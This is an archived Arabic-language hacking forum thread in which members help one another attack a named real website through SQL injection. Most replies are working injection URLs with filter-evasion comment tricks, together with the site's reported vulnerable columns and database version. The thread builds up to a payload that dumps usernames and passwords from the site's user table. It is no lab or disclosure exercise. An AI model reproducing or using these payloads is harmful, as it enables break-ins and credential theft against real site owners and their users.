:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/forumdisplay.php?f=343)
-   -   about SQL injection (http://www.vbspiders.com/vb/showthread.php?t=61257)

DBZ 03-10-2012 07:21 PM

about SQL injection
 
http://hopelutherancranberry.org/readnews.php?id=199


هذا الموقع فيه فلترة كبيره تجاوزت البعض و فشلت في البعض
حاولت بكل الشرحات و ما فيها اي حل
هاي الخطوات الي تفاديتها :
كود PHP:

http://hopelutherancranberry.org/readnews.php?id=199'/*!UNION SELECT*/ 1,2,3,/*!group_concat*/(table_name),5,6,7 from information_schema.tables-- - 

لما بجي انفذ امر استعلام الجداول يعطيني فوردبيدن
و لما استخدم دا الامر :
كود PHP:

http://hopelutherancranberry.org/readnews.php?id=199'/*!UNION SELECT*/ 1,2,3,/*!concat*/(column_name,0x3a,table_name,0x3a,table_schema),5,6,7 from information_schema.columns-- - 

الاستعلام مافيه فوربيدن و لكن ما يخرج لي اي معلومات و الله غريب
شو النتيجه :
كود:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/hope/public_html/readnews.php on line 78
كانه خطا في الاستعلام، و انا اضنه ذا الاستعلام صحيح 100%
لا فيه احد الطلاب هنا محترف حقن يفيدنا و اجركم على الله

سلام عليكم

DBZ 03-11-2012 01:18 AM

رد: about SQL injection
 
ياه و لا واحد ............

Dr.Unkn0wn 03-13-2012 03:01 PM

رد: about SQL injection
 
Try This
كود PHP:

http://hopelutherancranberry.org/readnews.php?id=-199/*!UNION%20SELECT*/%201,2,3,/*!concat*/(column_name,0x3a,table_name,0x3a,table_schema),5,6,7%20from%20information_schema.columns-- 


aircrack -ng 03-13-2012 06:22 PM

رد: about SQL injection
 
كود PHP:

http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,4,5,6,7-- - 

الاعمده المصابه 4 و6

اصدار القاعده 5
hope_hope@localhost : hope_hope : 5.0.95-community

كود PHP:

http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7-- - 

الجداول

كود PHP:

http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,table_name,5,6,7+from+information_schema. tables-- - 

الحقنه
كود PHP:

http://hopelutherancranberry.org/readnews.php?id=-199' UNION /*!SELECT*/ 1,2,3,CONCAT_WS(CHAR(32,58,32),name,pass),5,6,7++from+thyme_Users-- - 


DBZ 03-18-2012 02:26 PM

رد: about SQL injection
 
Thank's aircrack-ng
بس يا ليت شرح لكيفيه تخطي حماية ذاك الموقع
و بارك الله فيك يا غلا


الساعة الآن 01:36 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0